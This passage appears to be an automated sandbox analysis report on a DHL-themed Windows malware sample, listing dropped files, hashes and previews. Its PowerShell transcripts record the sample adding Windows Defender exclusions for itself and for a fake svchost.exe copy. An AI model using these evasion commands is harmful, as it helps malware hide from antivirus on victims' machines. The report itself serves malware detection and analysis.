Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	25168
Entropy (8bit):	4.975582086060887
Encrypted:	false
SSDEEP:	768:6BV3IpNBQkj2Lh4iUxQedNYotBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYoI:6BV3CNBQkj2Lh4iUxvdNYotBV3CNBQkx
MD5:	62E1AE94DE84ED9286704EBD6856A263
SHA1:	4888C4CFAA74FA9BCD7339CBF760B1060314246B
SHA-256:	9AC3E181F8EB940093EF7F212696338C30CD1407AF8ECB25610C39D6B00D4C43
SHA-512:	E99B7BA733C622C675AA7944338E994EE0D941663D812D702D986F4C162C4BC40FA2C837C6C761598B826A8CB7157DFBDDC20932B41B3D637209B3333BEEEB37
Malicious:	false
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11119374538069152
Encrypted:	false
SSDEEP:	12:dOXejXm/Ey6q99959RNnekXg1Q10nMCldimE8eawHjcxX:wrl68TecyMCldzE9BHjcx
MD5:	DF31CA06A3E8E21DEC39A8FABC22C1CD
SHA1:	99A696182DABE9F6CAC4F9E6A1984C4C9E35F40B
SHA-256:	85B0371DC3874C81589681BE4841518071F83C2E73BA2FB0955931B4C4804CA6
SHA-512:	1E60F45A9292FE4A73FCD59E0A141AC91CE9FEE2C4A2F3CEA05253E066874DE374B2B493EEBE9562F53202833B2685A6626006A164FC5B14B2C665B6A83DA919
Malicious:	false
Preview:	....................................................................................h...a........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................[....... .......?..+..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....h...B...............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11363070042401822
Encrypted:	false
SSDEEP:	12:OCcF1VXm/Ey6q99959RNp1miUkXg1Q10nMCldimE8eawHza1miI2F:OCcF14l68Tp1tUcyMCldzE9BHza1tI2F
MD5:	E86A90902EEAB2CE0138CB018491A009
SHA1:	F6B46E95E2C020C6CD9780A9E0A50DE0CF832283
SHA-256:	C2D62F0E5FC32691946942D968CCE69CF1B962F1DC2A22C46AAA91421660DDFD
SHA-512:	2787AEFB7C2E5A729C1F46DCCCF50335BF855C971B96BDAB581ECF6E746FA9C0A69D34CBC6426DE277578353DDFBE26B056FB07221BCAB307AFEBAC15942705C
Malicious:	false
Preview:	............................................................................ .......h............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................[....... ..........+..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....h...n+..............................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11341351458832136
Encrypted:	false
SSDEEP:	12:OCcFlXm/Ey6q99959RNldh1mK21kXg1Q10nMCldimE8eawHza1mKv:OCcFIl68Tl/1i1cyMCldzE9BHza1r
MD5:	79C322B21806F5C73496CA5041837F64
SHA1:	B2DB2C2DB23434AB229A7E8DE316ACCEFE23A3DA
SHA-256:	D238E8080AF629F6A6F6DF9F9650C4B1E15CEE013F49C41F56D18204FA3A99BF
SHA-512:	6373EF3DBA4E9343CA9D4C3C144F2B1F037979BCCCFC32304A7A692074FE3DA33A90B3DA7CC75B709EB064C0851D79379BFD05FABD3622C9F48FAFC76C1A4609
Malicious:	false
Preview:	............................................................................ .......h............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................[....... ......+...+..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....h...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zsk1rf2.cst.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ef1wbei2.1jt.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkp2kheu.lcy.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkjtufbf.qos.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5fxcbmx.t00.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztyu0d2h.lpx.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	data
Category:	dropped
Size (bytes):	2088
Entropy (8bit):	7.024371743172393
Encrypted:	false
SSDEEP:	48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrw8:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCe
MD5:	0D6805D12813A857D50D42D6EE2CCAB0
SHA1:	78D83F009D842F21FE2AB0EAFFD00E5AAD1776F4
SHA-256:	182E0F8AA959549D61C66D049645BA8445D86AEAD2B8C3552A9836FA1E5BD484
SHA-512:	5B29496F3AB3CCB915CF37042F4956BB00E577B5F15457A5A739BE1BD50C481FB7E3297EED575DCA7A7BD30ECBC140DD3666CD7DEDD25DFB7AEB41A1B5BEDA4A
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:9KMt:B
MD5:	10A433756D02740F5228137E3E4F88B5
SHA1:	635501C1B9BA4F677DC60EBD1AAFFA14A7A18D61
SHA-256:	02D4E86EE420790DFB885F6A324975D0C69ADC0F4183B1175ADBD17B59A6BE13
SHA-512:	D4AF3FCF23711508EEE9D434851FF24C5FFB04F71EC3685ED2C265912707723CE90D3115D4521C46C23862E7BC6DC5AB4F095751EF780B040A26CD60CB510AFB
Malicious:	true
Preview:	.......H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	data
Category:	modified
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	data
Category:	dropped
Size (bytes):	327432
Entropy (8bit):	7.99938831605763
Encrypted:	true
SSDEEP:	6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
MD5:	7E8F4A764B981D5B82D1CC49D341E9C6
SHA1:	D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
SHA-256:	0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
SHA-512:	880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
Malicious:	false
Preview:	pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...\|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.).....{B.[...y%...i.Q.<..xt.X..H.. ..HF7g...I.3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.\|i4...i...;O...n.?.,. ....v?.5}.OY@.dG\|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...\|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`\|.B....3.....I..o...u1..8i=.z.W..7

C:\Users\user\Documents\20210407\PowerShell_transcript.138727.MUoHEg_8.20210407084145.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	888
Entropy (8bit):	5.369979402850898
Encrypted:	false
SSDEEP:	24:BxSAtdZOvBdaEx2DOXUWeSuAjOzWAHjeTKKjX4CIym1ZJXHuAjO7:BZYv6EoO+SVjO6AqDYB1ZFVjO7
MD5:	9DC25C52C731AC12A4F76A9418284D4C
SHA1:	7CA13A512746EE805DEABEF68DFEBA79DB870154
SHA-256:	1A23B9F69DA5750F5ADD7235010FF9301EFE65F266F714B8BBE43C2132A85C02
SHA-512:	A9BA7CCF55037391CF603A8053B6187957A63B9F425437F276F96FBEE4DB43DF1AF53A55EAD68BFE715C787C639A49608826C7EB33E6064C21BC51A2B74AE26B
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210407084209..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe -Force..Process ID: 6240..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210407084210..********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe -Force..

C:\Users\user\Documents\20210407\PowerShell_transcript.138727.NgzKxtXm.20210407084147.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	898
Entropy (8bit):	5.3334204738068856
Encrypted:	false
SSDEEP:	24:BxSAMydZOvBdaEx2DOXUWeSu0WbrHjeTKKjX4CIym1ZJXKuA:BZiv6EoO+ScbrqDYB1Z49
MD5:	25503986AED514B0205E0FB054DCD97C
SHA1:	81DA6E024FE548871C5EC0928ACAC513062674A2
SHA-256:	84563D8B03CDD7388225E1D089F221ADD3830BE263CD5B69FDB068D0CB580241
SHA-512:	67A6513D98F8C9DA66A2961E35999299A5229417390B44CF176315C8039C35146D6DB693C7095C2F10AFEB8C75E4303308C3DCA8F1622D90A5EB53C3F3AEA367
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210407084214..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DHL_document11022020680908911.exe -Force..Process ID: 6416..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210407084215..********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DHL_document11022020680908911.exe -Force..

C:\Users\user\Documents\20210407\PowerShell_transcript.138727.veQ4ZxRr.20210407084148.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	888
Entropy (8bit):	5.374022037620394
Encrypted:	false
SSDEEP:	24:BxSARidZOvBdaEx2DOXUWeSuAjOzWPHjeTKKjX4CIym1ZJXKuAjO7:BZ3v6EoO+SVjO6PqDYB1Z4VjO7
MD5:	30A670A393C3AF5AE36A0F2FA9A6311A
SHA1:	8611F52AED4FEDFD39D038E90947F5F6575398B4
SHA-256:	06EE950B439D95D4BA63E59059F059447717D7742091DECF6CFE44C026730630
SHA-512:	245EAD46F917C12FEB523211C2609C5F1D3BACDA6E663DB2B6706C574169968D239DA39CBC47EED1639E185EFBF5DB9B73D8274B05877F120891FF4C3F780C2C
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210407084215..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe -Force..Process ID: 6452..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210407084215..********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe -Force..

C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	83728
Entropy (8bit):	5.714633843934463
Encrypted:	false
SSDEEP:	768:DVo9K0V0z/hpL8dKKuzVczbeso66z0Rb6eQxl8+to23I9aFhVkSdM2VhY:DOKU0Dhp7HI
MD5:	DC8E7CDE980F05501758F8CE3048682E
SHA1:	FCA9C2A66CFDDFE6A8677E1568EA32AD18DDA600
SHA-256:	E3B80DB58C1FA79C3780E68CF7D3EA987FB2615A68077BA3B110CFD3A7CF4DE6
SHA-512:	5CD3210D136DCC6854781911960D7ABEB6AFCC2B22D78AC37665D68C93D7141335EBE1865DB42098D7A17AB7B2C035D77B9621E814C0E0D1843B11B82D7C82E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 15%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$............."...0..&..........NE... ...`....@.. ...............................x....@..................................D..S....`...............2............................................................... ............... ..H............text...T%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B................0E......H.......(&...............................................................>..r...p.o.....".(.....Vs....(....t.........".(.....R.(.......s....}....6.(....o8........0...........~.....+....0............r...po....t"....+.....0..9........s.....+...-....o....o.....o....,...o........o....o.........0...........(....o.....+.+.../....*.0...........r...p.+...1......s......%r...pr...p~....(?...o....%r...pr...p~....(?...o......}....r...pr...p~....(?...r._.p~....(....s........(...

C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.1499148518857583
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3rlsrfu6x0k9+MlWlLehB4yAq7ejCEsrfut:OaqdmuF3rl2+kWReH4yJ7MNP
MD5:	5BBC163B5F9762B4A2ED59D371DE9787
SHA1:	3835361C07CBA8741990B4E0CBBCB51A78D3F017
SHA-256:	D5160E7287ABE80434C8C0DA30109F1B6745905D1B5B4F10AF61FD964FA88BEB
SHA-512:	32E616DF5ABE67723ABAB497BC412CCA1CD01269521A7B4ABDC0AC0B8E7B5FB507C2C3149684CAF24D530DC37E5948E434BE9E07453D616016B85E4053BB5E64
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. A.p.r. .. 0.7. .. 2.0.2.1. .0.8.:.4.2.:.5.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. A.p.r. .. 0.7. .. 2.0.2.1. .0.8.:.4.3.:.0.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.714633843934463
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL_document11022020680908911.exe
File size:	83728
MD5:	dc8e7cde980f05501758f8ce3048682e
SHA1:	fca9c2a66cfddfe6a8677e1568ea32ad18dda600
SHA256:	e3b80db58c1fa79c3780e68cf7d3ea987fb2615a68077ba3b110cfd3a7cf4de6
